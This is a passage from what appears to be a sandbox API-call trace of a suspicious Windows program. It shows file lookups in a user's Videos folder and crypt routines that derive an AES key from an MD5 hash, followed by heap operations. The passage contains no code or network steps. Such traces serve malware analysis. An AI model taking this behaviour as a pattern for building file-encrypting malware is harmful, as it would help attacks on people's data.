lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8e0e70, ftCreationTime.dwHighDateTime=0x1d5e803, ftLastAccessTime.dwLowDateTime=0x46566030, ftLastAccessTime.dwHighDateTime=0x1d5dc83, ftLastWriteTime.dwLowDateTime=0x46566030, ftLastWriteTime.dwHighDateTime=0x1d5dc83, nFileSizeHigh=0x0, nFileSizeLow=0xfcbc, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="-AawcGHZf1n-uzNR9.mp4", cAlternateFileName="-AAWCG~1.MP4")) returned 0x90af58 [0191.962] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0191.962] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.962] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.962] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.962] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.962] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.963] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.963] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0191.963] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.963] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.963] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0191.963] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.963] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.963] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.963] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.963] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.963] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0191.963] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.963] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0191.965] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.965] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.965] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0191.965] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.965] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.965] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.965] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.965] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.965] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.965] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.965] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.965] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.965] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.965] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.965] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.965] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0191.965] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.965] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.966] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.966] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.966] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.966] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.966] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.966] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.966] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.966] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.982] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.982] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.982] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.982] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.982] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.982] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.982] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.982] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.982] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.982] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0191.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.983] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0191.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.983] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.983] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.983] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0191.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.983] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.983] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.983] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.983] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.984] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0191.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0191.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0191.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0191.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0191.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0191.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0191.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0191.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0191.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0191.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0191.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0191.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0191.988] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0191.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0191.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0191.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0191.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0191.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0191.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0191.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0191.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0191.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0191.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0191.988] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0191.988] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0191.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.989] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0191.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 